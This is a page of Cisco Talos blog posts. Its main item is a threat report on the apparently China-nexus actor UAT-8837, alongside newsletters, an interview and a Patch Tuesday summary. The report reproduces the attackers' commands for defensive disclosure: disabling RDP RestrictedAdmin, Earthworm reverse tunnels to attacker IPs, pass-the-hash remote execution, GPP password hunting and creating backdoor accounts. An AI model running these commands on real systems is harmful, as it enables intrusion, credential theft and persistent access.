In this week’s newsletter, Martin examines the evolving landscape for 2026, highlighting key threats, emerging trends like AI-driven risks, and the continued importance of addressing familiar vulnerabilities.

Thursday, January 15, 2026 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

It’s become traditional at this time of year to make predictions about cybersecurity for the coming year. Obviously, no one has a crystal ball to predict the future, and if they did, they would be quietly making a fortune rather than sharing their insights in a newsletter. Any predictions about what lies ahead in the coming year should be taken with a generous pinch of salt. 

However, the exercise isn’t futile. Taking time to pause and reflect on the current threat landscape, the forces driving change, and how our own exposure is evolving can help us form reasonable guesses about what might happen during the forthcoming year. 

We’re living in a very tense geopolitical environment. We should expect continued use of infostealer malware and phishing campaigns as adversaries seek to map supply chains, and understand how organisations and governments may react to escalating aggression. As part of this activity, we’ll continue to see proxy actors conducting destructive attacks and financing their activities through extorting payment. Less sophisticated groups may also engage in website defacements or deploy disruptive malware in pursuit of political visibility or ideological goals. 

Suffice to say that we are living in tense and difficult times. In a globally connected world, no one is isolated from the effects of conflict, no matter how distant it may seem. 

At the same time, our use of technology continues to evolve, reshaping our threat exposure. Many organizations have already enthusiastically embraced generative AI. As AI systems are given more autonomy and broader access to internal systems, we can imagine that we will see breaches caused by poorly constrained or insufficiently governed AI agents. 

Many accidental or malicious insider attacks are caused by individuals having excessive permissions or unfettered access to data with little oversight. We can imagine AI agents provoking similar incidents, whether through flawed design, unintended behavior, or deliberate prompt manipulation by an attacker. 

While it is important to consider these newer and more exotic threats, we should not lose sight of the familiar ones. Unpatched systems, leaked credentials, accounts lacking multi-factor authentication, and poor network visibility continue to underpin many successful attacks. 

One thing is certain: Cybersecurity teams will remain busy throughout 2026.  There will be threat actors attempting to compromise our systems, there will be new techniques that they will use, but there will be many more attacks using techniques that we _have_ seen before. 

It’s going to be a demanding year. Wishing good fortune and happy threat hunting to everyone.

**The one big thing **

Cisco Talos is monitoring UAT-8837, which we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor. They have been actively targeting critical infrastructure organizations in North America since at least 2025. They typically gain access by exploiting vulnerabilities or using stolen credentials, then use a mix of open-source tools to steal sensitive data and create multiple ways back into the network. UAT-8837 adapts quickly, constantly changing up their tools to evade detection. 

**Why do I care? **

This group is focused on high-value targets and uses advanced, constantly evolving techniques that can bypass traditional defenses — even leveraging zero-day vulnerabilities. Their actions can lead to stolen credentials, persistent access, and potentially large-scale supply chain or infrastructure disruptions. 

**So now what? **

Stay vigilant by keeping systems patched, monitoring for the specific tools and behaviors outlined in the report, and using up-to-date detection rules from sources like Talos. Proactively hunting for these IOCs and unusual user/account activity, combined with strong credential and privilege management, will be crucial to reducing risk from UAT-8837.

**Top security headlines of the week **

**BreachForums** **breached, exposing** **324K cybercriminals**   
In an ironic development, an individual using the moniker "James" published a database containing detailed information of hundreds of thousands of BreachForum users who believed they were operatinganonymously. (DarkReading) 

**Target's dev server offline after hackers claim to steal source code**   
An unknown threat actor has claimed to have stolen a trove of Target's internal source code and documentation and is selling it on dark web marketplaces. Multiple Target employees have now confirmed the authenticity of leaked source code sample set. (BleepingComputer) 

**Predator spyware turns failed attacks into intelligence for future exploits**   
New research reveals previously undocumented mechanisms that return information to developers on failed individual attacks. This means Predator can learn from its own failures so that future versions may be hardened against detection and analysis. (SecurityWeek) 

**Instagram** **fixes** **password** **reset** **vulnerability** **amid** **user** **data** **leak**   
Social media giant Meta confirmed an Instagram password reset vulnerability but denied being breached. Meta said the resolved vulnerability allowed third parties to send password reset requests to Instagram users. (SecurityWeek) 

**Everest Ransomware claims breach at Nissan, says 900GB of data stolen**  
While no sensitive personal data is shown in the screenshots themselves, the folder names and file types imply access to operational systems and documents that could be used to map internal processes or extract more sensitive information. (Hack Read) 

**Can’t get enough Talos? **

**Talos Takes: Cyber certifications and you**   
In the first episode of the year, Amy Ciminnisi, Talos’ Content Manager and new podcast host, steps up to the mic with Joe Marshall to explore certifications, one of cybersecurity’s overwhelming (and sometimes most controversial) topics. 

**Humans of Talos:** **Brushstrokes and breaches with Terryn Valikodath**   
Join us as Terryn shares what keeps him motivated during high-pressure incidents, the satisfaction he finds in teaching others during Cyber Range trainings, and the creative outlets that help him recharge. 

**Microsoft Patch Tuesday for January 2026**   
Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical.”

**Upcoming events where you can find Talos **

*   JSAC (Jan. 21 – 23) Tokyo, Japan
*   Cisco Live Amsterdam (Feb. 9 – 13) Amsterdam, Netherlands
*   S4x26 (Feb. 23 – 26) Miami, FL  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59**   
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59    
Example Filename: APQCE0B.dll    
Detection Name: Auto.90B145.282358.in02 

**SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**    
MD5: 7bdbd180c081fa63ca94f9c22c457376    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe\_3\_Exe.exe    
Detection Name: Win.Dropper.Miner::95.sbx.tg 

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe    
Detection Name: Win.Worm.Coinminer::1201 

**SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**    
MD5: 85bbddc502f7b10871621fd460243fbc    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610    
Example Filename: 85bbddc502f7b10871621fd460243fbc.exe    
Detection Name: W32.41F14D86BC-100.SBX.TG 

**SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**    
MD5: 71fea034b422e4a17ebb06022532fdde    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca    
Example Filename: VID001.exe    
Detection Name: Coinminer:MBT.26mw.in14.Talos

Predicting 2026

Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.

Thursday, January 15, 2026 06:00

*   Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on overlaps in tactics, techniques, and procedures (TTPs) with those of other known China-nexus threat actors.
*   Based on UAT-8837's TTPs and post-compromise activity Talos has observed across multiple intrusions, we assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.
*   Although UAT-8837's targeting may appear sporadic, since at least 2025, the group has clearly focused on targets within critical Infrastructure sectors in North America.

After obtaining initial access — either by successful exploitation of vulnerable servers or by using compromised credentials — UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as credentials, security configurations, and domain and Active Directory (AD) information to create multiple channels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy. The TTPs, tooling, and remote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a ViewState Deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access to zero-day exploits.

**Post-compromise actions**

UAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. Most recently, UAT-8837 exploited a ViewState Deserialization zero-day vulnerability in SiteCore products, CVE-2025-53690, to obtain initial access.

After UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following commands:

ping google\[.\]com
tasklist /svc
netstat -aon -p TCP
whoami
quser
hostname
net user

The threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting into other devices:

REG ADD HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG\_DWORD /d 00000000 /f

A shell console may subsequently be opened via “cmd.exe” to conduct hands-on keyboard activity on the compromised endpoint. Multiple artifacts are then downloaded to the following directories which were extensively used for staging artifacts:

C:\\Users\\<user>\\Desktop\\
C:\\windows\\temp\\
C:\\windows\\public\\music

UAT-8837 may use a variety of tooling throughout the course of an intrusion. This variation in tooling may be because many of these tools are detected and blocked by most security products such as Cisco Secure Endpoint (CSE) which often leads the threat actor to cycle through different variants of the tools to find versions that are not detected.

**GoTokenTheft**

The GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:\\Users\\<user>\\Desktop\\go.exe, it may be used to steal tokens to run commands with elevated privileges:

eee.ico REG ADD HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG\_DWORD /d 00000000 /f

**Earthworm**

Earthworm is network tunneling tool that has extensively been used by Chinese-speaking threat actors in intrusions to expose internal endpoints to attacker-owned remote infrastructure. UAT-8837 deploys multiple versions of Earthworm to determine which are not detectable by endpoint protection products. The undetected version is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:

C:\\Windows\\Temp\\v.ico -s rssocks -d 172\[.\]188\[.\]162\[.\]183 -e 1433
  
C:\\users\\public\\videos\\verr.ico -s rssocks -d 172.188.162.183 -e 443
  
C:\\Windows\\Temp\\eir.ico  -p 8888 -t 172\[.\]188\[.\]162\[.\]183 -f 11112
  
cisos.ico -s rssocks -d 172\[.\]188\[.\]162\[.\]183 –e80
  
vgent.ico -s rssocks -d 172\[.\]188\[.\]162\[.\]183 -e 443
  
vgent.ico -s rssocks -d 172\[.\]188\[.\]162\[.\]183 -e 447
  
abc.ico -s rssocks -d 4\[.\]144\[.\]1\[.\]47 -e 448
  
C:\\users\\public\\music\\aa.exe -s rssocks -d 74\[.\]176\[.\]166\[.\]174 -e 443
  
C:\\Users\\public\\Music\\twd.exe -s rssocks -d 20\[.\]200\[.\]129\[.\]75 -e 443

**DWAgent**

UAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint and drop additional malware to the system:

C:\\Users\\\\Downloads\\dwagent.exe
 
C:\\Users\\\\AppData\\Local\\Temp\\dwagent20250909101732\\runtime\\dwagent.exe -S -m installer

**SharpHound**

Per Talos’ observations, UAT-8837 downloads SharpHound with the intention to collect Active Directory information:

C:\\Windows\\Temp\\SharpHound.exe

**Impacket**

UAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:

C:\\Windows\\Temp\\wec.ico

When Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated privileges:

C:\\Windows\\Temp\\Invoke-WMIExec.ps1

**GoExec**

In one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote execution tool to execute commands on other connected remote endpoints within the victim’s network:

goe.ico wmi proc 10\[.\]xx\[.\]xx\[.\]xx -u <u>/<p> -H <hash> -e 'cmd.exe' -a '/C hostname /all' -o-
 
C:\\Windows\\Temp\\goe.exe wmi proc 10\[.\]xx\[.\]xx\[.\]xx \\
 
goe.ico wmi proc 10\[.\]xx\[.\]xx\[.\]xx -u <u>/<p> --nt-hash <hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10\[.\]xx\[.\]xx\[.\]xx -u <user> --nt-hash <hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10\[.\]xx\[.\]xx\[.\]xx -u <user> --nt-hash 00000000000000000000000000000000:<hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico dcom mmc 10\[.\]xx\[.\]xx\[.\]xx -u <user> --nt-hash 00000000000000000000000000000000:<hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10\[.\]xx\[.\]xx\[.\]xx -u <user> -p <password> -e cmd.exe -a /C hostname -o 1.txt
 
g.ico dcom mmc 10\[.\]xx\[.\]xx\[.\]xx -u <user> -p <password> -e cmd.exe -a /C ipconfig -o-
g.ico wmi proc 10\[.\]xx\[.\]xx\[.\]xx -u <user> -p <password> -e cmd.exe -a /C hostname -o-

It is worth noting here that the usage of GoExec was likely an on-the-fly decision by the operator, necessitated by the constant detection and blocking of the threat actors tooling by CSE.

The threat actor also attempted to download and execute SharpWMI in the compromised environment, which was again detected by CSE:

C:\\Windows\\Temp\\s.ico

**Rubeus**

Rubeus, a C# based toolset for Kerberos abuse may also be deployed:

*   C:\\Windows\\Temp\\r.ico
*   C:\\Windows\\Temp\\lo.txt

**Certipy**

UAT-8837 also deploys Certipy, a tool for AD discovery and abuse, to:

C:\\Windows\\Temp\\Certipy.exe

**Hands-on-keyboard activity**

UAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials from victim organizations:

findstr /S /l cpassword \[\\\\\]\\policies\\\*.xml

 The system’s security configuration is also exported using secedit:

secedit /export /cfg C:\\windows\\temp\\pol.txt

 Windows Local security policies extracted via secedit include password policies, user rights and audit settings. This information may be valuable to adversaries who seek to evaluate an endpoint's security posture including network security settings.

In one victim organization, UAT-8837 exfiltrated DLL-based shared libraries related to the victim’s products, raising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply chain compromises and reverse engineering to find vulnerabilities in those products.

**Domain reconnaissance**

The net commands typically used to query domain groups and users are:

net group domain admins /domain

net localgroup administrators /domain

net group <name> /domain
 
net user <user> <password> /domain

net user <user> /domain

net accounts /domain

net user <user> /domain
 
nltest /DCLIST:<domain>

nslookup <subdomina>.<domain>

 The setspn command is used to list and query Service Principal Names (SPN) data from Active Directory:

setspn -L 

setspn -Q \*/\*

**Active Directory reconnaissance**

UAT-8837 deploys a combination of tools to perform AD reconnaissance in the compromised environment. These tools include SharpHound and Certipy. The threat actor also uses the Windows-native tool “setspn” to query for AD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. In one intrusion, the actor deployed dsget and dsquery to query for specific properties in the AD:

dsquery.exe user -limit 0 
  
dsquery.exe user -name <name>
  
dsget user -samid -display -email -upn
  
dsget.exe user -samid -display -email -upn
  
dsquery.exe user -samid <id> 
  
dsget.exe user -display -email -upn
  
dsquery.exe user -name admin
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com -samid -display -email -upn
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com -upn
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com –memberof
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com –disabled
  
dsquery \* DC=prod,DC=<domain>,DC=com -filter (objectClass=user) -attr \* -limit 0

**Backdoored user accounts**

The threat actor created user accounts to open up another channel of access to the compromised environment:

net user <user> <password> /add /domain

In another instance, UAT-8837 added an existing user account to local groups:

net user <user>
  
net localgroup <group> <user> /add

**Coverage**

The following ClamAV signature detects and blocks this threat:

*   Win.Malware.Earthworm

The following Snort Rules (SIDs) detect and block this threat:

*   Snort 2 – 61883, 61884, 63727, 63728
*   Snort 3 – 300585, 63727, 63728

**Indicators of compromise (IOCs)**

The IOCs for this threat are also available at our GitHub repository here.

1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa – GoTokenTheft
451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd - Earthworm
B3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b – Earthworm
Fab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6 – Earthworm
4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883 - Earthworm
 
891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795 - GoTokenTheft
5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796 – SharpHound
6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0 – Impacket
887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744 – GoExec
4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c - GoExec
1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183 – SharpWMI
51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487 – Rubeus
2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59 – Rubeus
E27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d – Certipy
 
B7ecd4ff75c0e3ed196e1f53d92274b1e94f17fa6c39616ce0435503906e66fb
42e3ad56799fbc8223fb8400f07313559299496bb80582a6cbae29cb376d96c3
6d20371b88891a1db842d23085a0253e36cf3bf0691aee2ae15a66fc79f3803d
4e8304040055d3bffcb3551873da45f66577723d1a975416a49afa5aec4eb295
BDF7B28DF19B6B634C05882D9F1DB73F63252F855120ED3E4DA4E26F2C6190E8
1c5174672bf2ccedb6a426336ca79fd326e61cd26dd9ae684b8ffd0b5a70c700
d0beb6184ea4402c39e257d5912c7ace3607e908e76127014e3ec02866b6d70c
194ca1b09902ceaaa8a7e66234be9dc8a12572832836361f49f1074eae861794
74e68b4e07d72c9b8e0bc8cbfd57f980b4a2cd9d27c37bb097ca4fb2108706e3
Ced14e8beb20a345a0d6f90041d8517c04dbc113feff3bc6e933968d6b846e31
8bf233f608ea508cd6bf51fb23053d97aa970b8d11269d60ce5c6e113e8e787a
5391f69425217fa8394ebac0d952c5a3d1f0f5ac4f20587978cd894fdb6199cd
8bc008a621c5e3068129916770d24ee1d7d48079ee42797f86d3530ca90e305c
De9c13b1abeab11626a8edc1385df358d549a65e8cc7a69baca84cd825acc8e7
4d47445328bfd4db12227af9b57daab4228244d1325cba572588de237f7b2e98
 
74\[.\]176\[.\]166\[.\]174
20\[.\]200\[.\]129\[.\]75
172\[.\]188\[.\]162\[.\]183
4\[.\]144\[.\]1\[.\]47
103\[.\]235\[.\]46\[.\]102

**Integrated Coverage**

UAT-8837 targets critical infrastructure sectors in North America

Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family's tech — interests that eventually steered him toward the fast-paced world of digital investigations.

Wednesday, January 14, 2026 06:00

Cisco Talos is kicking off the new year with a behind-the-scenes look at incident response through the eyes of Terryn Valikodath, Senior Incident Response Consultant at Talos. In this episode, Amy sits down with Terryn to explore the realities of a job that blends technical know-how with communication skills, proactive planning, and a passion for problem-solving. Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family's tech — interests that eventually steered him toward the fast-paced world of digital investigations.

Join us as Terryn shares what keeps him motivated during high-pressure incidents, the satisfaction he finds in teaching others during cyber range trainings, and the creative outlets that help him recharge.

**Amy Ciminnisi: Can you tell us a little bit about what you do here in Talos?**

Terryn Valikodath: Absolutely. I’m a Senior Incident Response Consultant, so essentially an incident responder. The unique thing about our team is that we handle both proactive and reactive work. On the proactive side, we help develop incident response plans, run tabletop exercises, threat hunts, training, and similar tasks. On the reactive side, we step in when an organization experiences a security event, investigate, and provide recommendations to get them back up and running. It’s rewarding to see both sides of the work.

**AC: On my end, I'm always amazed at all the different services Cisco Talos Incident Response provides. Is it difficult to balance them, and is there a part of the job you enjoy most?**

TV: It definitely takes some getting used to since most cybersecurity roles focus on either proactive or reactive tasks, not both. But it’s helpful, because our direct experience informs the advice we give. For example, when we develop an incident response plan, we can reference real situations we’ve handled. That builds trust with customers. My favorite aspect is running cyber range trainings — a three-day course where we teach technical folks how to handle incident response. I’m passionate about teaching, both externally and within our team. I enjoy demystifying the field and showing people that it’s about dedication and learning, not just being a specialist.

_Want to see more? Watch the_ _full interview__, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos._

Brushstrokes and breaches with Terryn Valikodath

Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical”.

Tuesday, January 13, 2026 13:29

Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical”.  

In this month's release, Microsoft observed one of the included “important” vulnerabilities, CVE-2026-20805, as being exploited in the wild. Out of 8 "critical" entries, 6 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including Windows Local Security Authority Subsystem Service (LSASS), Microsoft Word, Microsoft Excel, and Microsoft Office. The two remaining “critical” entries are elevation of privilege (EoP) vulnerabilities affecting Windows Graphic Component and Windows Virtualization-Based Security (VBS) Enclave. 

CVE-2026-20822 is a critical elevation of privilege vulnerability affecting Windows Graphic Component. This vulnerability is due to a use-after-free (UAF) bug that could enable an attacker to obtain SYSTEM privileges on affected systems if exploited. This vulnerability was issued a CVSS 3.1 base score of 7.8 and would require an attacker to successfully win a race condition to achieve successful exploitation. Microsoft has assessed that exploitation of this vulnerability is “less likely” and that it has not been publicly disclosed. 

CVE-2026-20854 is a critical remote code execution vulnerability affecting Windows Local Security Authority Subsystem Service (LSASS). This vulnerability was issued a CVSS 3.1 base score of 7.5 and could enable an authorized attacker the ability to execute code on affected systems over a network. Successful exploitation of this vulnerability does not require elevated privileges. Microsoft has assessed that this vulnerability is “less likely” to be exploited and that it has not been publicly disclosed.  

CVE-2026-20876 is a critical elevation of privilege vulnerability affecting Windows Virtualization-Based Security (VBS) Enclave. This vulnerability is due to a heap-based buffer overflow that could enable local privilege elevation if successfully exploited by an authorized attacker. Successful exploitation of this vulnerability could grant an attacker Virtual Trust Level 2 (VTL2) privileges on affected systems. This vulnerability was issued a CVSS 3.1 base score of 6.7 and has been assessed by Microsoft to be “less likely” to be exploited and has not been publicly disclosed.  

CVE-2026-20944 is a critical remote code execution vulnerability affecting Microsoft Word. This vulnerability is due to an out-of-bounds read and could enable an attacker to execute arbitrary code on affected systems. To exploit this vulnerability, an attacker would need to convince victims to open a specially crafted malicious file on a vulnerable system. This vulnerability was issued a CVSS 3.1 base score of 7.8. Microsoft has assessed that this vulnerability is “less likely” to be exploited and has not been publicly disclosed.  

CVE-2026-20952 and CVE-2026-20953 are critical remote code execution vulnerabilities affecting Microsoft Office. These vulnerabilities are due to user-after-free conditions and could enable an unauthorized attacker to execute arbitrary code on affected systems. To successfully exploit either of these vulnerabilities, an attacker would need to log on and run a specially crafted application or convince a victim to open a malicious file on affected systems. Both vulnerabilities were issued a CVSS 3.1 base score of 8.4. Microsoft has assessed that these vulnerabilities are “less likely” to be exploited and neither were publicly disclosed. 

CVE-2026-20955 is a critical remote code execution vulnerability affecting Microsoft Excel. This vulnerability is due to an untrusted pointer reference and could be leveraged by an unauthorized attacker to execute arbitrary code on affected systems. To successfully exploit this vulnerability, an attacker would need to convince a victim to open a specially crafted malicious file. This vulnerability was issued a CVSS 3.1 base score of 7.8 and was assessed by Microsoft to be “less likely” to be exploited. Microsoft has also noted that this vulnerability has not been publicly disclosed. 

CVE-2026-20957 is a critical remote code execution vulnerability affecting Microsoft Excel. This vulnerability is due to an integer underflow that could be leveraged by an unauthorized attacker to execute arbitrary code on affected systems. To successfully exploit this vulnerability, an attacker would need to convince a victim to open a specially crafted malicious file. This vulnerability was issued a CVSS 3.1 base score of 7.8 and was assessed by Microsoft to be “less likely” to be exploited. Microsoft has also noted that this vulnerability has not been publicly disclosed. 

CVE-2026-20805 is an important information disclosure vulnerability affecting Desktop Window Manager. This vulnerability could allow for exposure of sensitive information on affected systems. This vulnerability was issued a CVSS 3.1 base score of 5.5 and was assessed by Microsoft to have already been previously exploited. Microsoft has noted that this vulnerability has not been publicly disclosed. 

Talos would also like to highlight the following "important" vulnerabilities as Microsoft has determined that their exploitation is "more likely:" 

*   CVE-2026-20816: Windows Installer Elevation of Privilege Vulnerability 
*   CVE-2026-20817: Windows Error Reporting Service Elevation of Privilege Vulnerability 
*   CVE-2026-20820: Windows Common Log File System Driver Elevation of Privilege Vulnerability 
*   CVE-2026-20840: Windows NTFS Remote Code Execution Vulnerability 
*   CVE-2026-20843: Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability 
*   CVE-2026-20860: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 
*   CVE-2026-20871: Desktop Windows Manager Elevation of Privilege Vulnerability 
*   CVE-2026-20922: Windows NTFS Remote Code Execution Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.    

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65498, 65499, 65663-65676.  

The following Snort 3 rules are also available: 301344, 301368-301374.

Microsoft Patch Tuesday for January 2026 — Snort rules and prominent vulnerabilities

Talos' editor ditches the pressure of traditional New Year’s resolutions in favor of practical, in-the-moment changes, and finds more success by letting go of perfection. Plus, we break down the latest on UAT-7290, a newly disclosed threat actor targeting critical infrastructure.

Thursday, January 8, 2026 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

I went to bed at 8:30 p.m. on New Year’s Eve, and I think that’s pretty indicative of how I approach the whole idea of New Year’s resolutions. 

I love to count down to the new year with loved ones as much as the next person, but I have really conflicted feelings about traditional resolutions. On one hand, it’s great to have goals for the future and pick a day to start putting them into action. On the other, why wait until the New Year, and why pick goals that are often wildly unsustainable? It feels like it just promotes an “all or nothing” approach, and starts the year on a disappointing note if you stumble even a little. Life happens, and many resolutions don’t give enough grace. 

Here are some resolutions I failed at this past year: 

*   Lift weights three days/week for a whole year: Close, but no cigar! 
*   Journal at least one sentence every day: Yeah, I failed at this one pretty quickly. I’m not a journal person. 
*   Knit at least three sweaters: I made a shirt, almost finished a vest, and spent a ton of money on yarn.

I have done a lot of things I’m proud about this year, so then... what _has_ worked? An intention that I’ve held throughout the year is turning “shoulds” into setting plans into motion right away. For example, “I should host a one-time book club to discuss my favorite book” becomes “I just posted in my neighborhood Facebook page to find people who are interested and pick a date.” Or “I should finish my certification” becomes “I just set a weekly three-hour calendar block, and I won’t move it unless there’s an emergency.”

That shift in mindset reminds me a lot of what works in cybersecurity. Our industry is full of ambitious, high-level goals: “Eliminate all vulnerabilities,” “achieve zero trust,” or “stop every threat.” These aspirations are important, but the reality is that security happens in small, consistent actions: patching systems as soon as updates are available, educating teams on the latest phishing techniques, reviewing logs regularly, or simply responding quickly to a new alert.

Just like with personal resolutions, there’s often pressure in security to be perfect, to never let anything slip through the cracks. Even the organizations that have amazing budget and headcount will face challenges and setbacks, and no environment is ever perfectly secure. What matters most is how we respond in the moment, learn from what’s happened, and keep moving forward.

So as we head into 2026, whether you’re setting personal goals or planning your organization’s security strategy, consider focusing less on flawless resolutions and more on building habits that adapt to change. Celebrate the small wins, reflect on what you’ve accomplished, and don’t be afraid to pivot when things don’t go as planned. Show up every day and take that next step.

**The one big thing **

Earlier today, Cisco Talos disclosed a sophisticated threat actor we track as UAT-7290, who has been active since at least 2022. UAT-7290 is tasked with gaining initial access as well as conducting espionage-focused intrusions against critical infrastructure entities in South Asia. UAT-7290's arsenal includes a malware family consisting of implants we call RushDrop, DriveSwitch, and SilentRaid. Our findings indicate that UAT-7290 conducts extensive technical reconnaissance of target organizations before carrying out intrusions. 

**Why do I care? **

UAT-7290 targets telecom and network infrastructure, which, if compromised, can have cascading impacts on national security, business operations, and customer data. Their advanced tactics, use of publicly available exploits, and ability to establish persistent footholds make detection and remediation difficult. 

**So now what? **

Review and apply the latest ClamAV and Snort signatures (see the blog) to detect and block UAT-7290’s malware and activity. Audit your edge devices (especially those exposed to the internet) for signs of compromise, weak credentials, or unpatched vulnerabilities, and prioritize patching and hardening them. Make sure your incident response plans are ready to address potential intrusions involving advanced persistent threats (APTs).

**Top security headlines of the week **

**U.S. cyber pros plead guilty over** **BlackCat** **ransomware activity**    
Two US citizens plead guilty to working as ALPHV/BlackCat ransomware affiliates in 2023. Along with an unnamed third conspirator, they were previously employed by security firms Sygnia and DigitalMint. (DarkReading)

**European** **Space Agency** **(ESA)** **confirms breach after hacker offers to sell data**   
The ESA has confirmed that some of its systems have been breached and is working on securing compromised devices. The hacker offered to sell 200GB of allegedly stolen data from ESA’s systems, including files from private Bitbucket repositories. (SecurityWeek)

**Sophisticated** **ClickFix** **campaign targeting hospitality sector**   
Fake Booking reservation cancellations and fake BSODs trick victims into executing malicious code leading to RAT infections. (SecurityWeek) (The Hacker News)

**New n8n vulnerability lets authenticated users execute system commands**    
It affects n8n versions from 1.0.0 up to, but not including, 2.0.0, and allows an authenticated user with permission to create or modify workflows to execute arbitrary operating system commands on the host running n8n. The issue has been addressed in version 2.0.0. (The Hacker News) 

**Russia-aligned hackers abuse Viber to target Ukrainian military and government**   
The attack chain involves the use of Viber to distribute malicious ZIP archives containing multiple Windows shortcut (LNK) files disguised as official Microsoft Word and Excel documents to trick recipients into opening them. (The Hacker News)

**Can’t get enough Talos? **

**How** **Cisco Talos powers the solutions protecting your organization**   
What happens under the hood of Cisco's security portfolio? Our reputation and detection services apply Talos' real-time intelligence to detect and block threats. Here's how. 

**The TTP: Talking through a year of cyber threats, in five questions**   
